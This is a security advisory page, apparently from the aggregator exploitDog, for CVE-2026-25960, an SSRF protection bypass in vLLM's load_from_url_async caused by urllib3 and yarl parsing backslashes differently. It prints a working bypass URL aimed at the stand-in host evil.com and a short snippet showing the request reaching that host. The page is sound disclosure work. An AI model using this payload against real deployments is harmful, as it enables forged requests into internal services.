Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-v359-jj2v-j536

Опубликовано: 09 мар. 2026
Источник: github
Github: Прошло ревью
CVSS3: 5.4

Описание

vLLM has SSRF Protection Bypass

Summary

The SSRF protection fix for https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client.

Affected Component

  • File: vllm/connections.py
  • Function: load_from_url_async

Vulnerability Details

Root Cause

The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing.

These two URL parsers handle backslash characters (\) differently:

ParserInput URLParsed HostParsed PathBehavior
urllib3.parse_url()https://httpbin.org\@evil.com/httpbin.org/%5C@evil.com/URL-encodes \ as %5C, treats \@evil.com/ as part of the path
yarl (via aiohttp)https://httpbin.org\@evil.com/evil.com/Treats \ as part of userinfo (user: httpbin.org\), the @ acts as the userinfo/host separator

Attack Scenario

# Attacker provides this URL malicious_url = "https://httpbin.org\\@evil.com/" # 1. Validation layer (urllib3.parse_url) parsed = urllib3.util.parse_url(malicious_url) # parsed.host == "httpbin.org" ✅ Passes validation # 2. Actual request (aiohttp with yarl) async with aiohttp.ClientSession() as session: async with session.get(malicious_url) as response: # Request actually goes to evil.com! ❌ Bypass!

Why This Happens

  1. yarl: Interprets httpbin.org\ as the userinfo component, and @ as the userinfo/host separator, so the URL is parsed as user=httpbin.org\, host=evil.com, path=/
  2. urllib3: URL-encodes the backslash as %5C, so \@evil.com/ becomes /%5C@evil.com/ which is treated as part of the path, leaving host=httpbin.org

This inconsistency allows an attacker to:

  • Bypass the hostname allowlist check
  • Access arbitrary internal/external services
  • Perform full SSRF attacks

Fixes

Ссылки

Пакеты

Наименование

vllm

pip
Затронутые версииВерсия исправления

>= 0.15.1, < 0.17.0

0.17.0

EPSS

Процентиль: 6%
0.00021
Низкий

5.4 Medium

CVSS3

CVE ID

CVE-2026-25960

Дефекты

CWE-918

Связанные уязвимости

redhat логотип

CVE-2026-25960

CVSS3: 7.1
redhat
19 дней назад

vLLM is an inference and serving engine for large language models (LLMs). The SSRF protection fix for CVE-2026-24779 add in 0.15.1 can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client. The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing. This vulnerability in 0.17.0.

nvd логотип

CVE-2026-25960

CVSS3: 7.1
nvd
19 дней назад

vLLM is an inference and serving engine for large language models (LLMs). The SSRF protection fix for CVE-2026-24779 add in 0.15.1 can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client. The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing. This vulnerability in 0.17.0.

debian логотип

CVE-2026-25960

CVSS3: 7.1
debian
19 дней назад

vLLM is an inference and serving engine for large language models (LLM ...

EPSS

Процентиль: 6%
0.00021
Низкий

5.4 Medium

CVSS3

CVE ID

CVE-2026-25960

Дефекты

CWE-918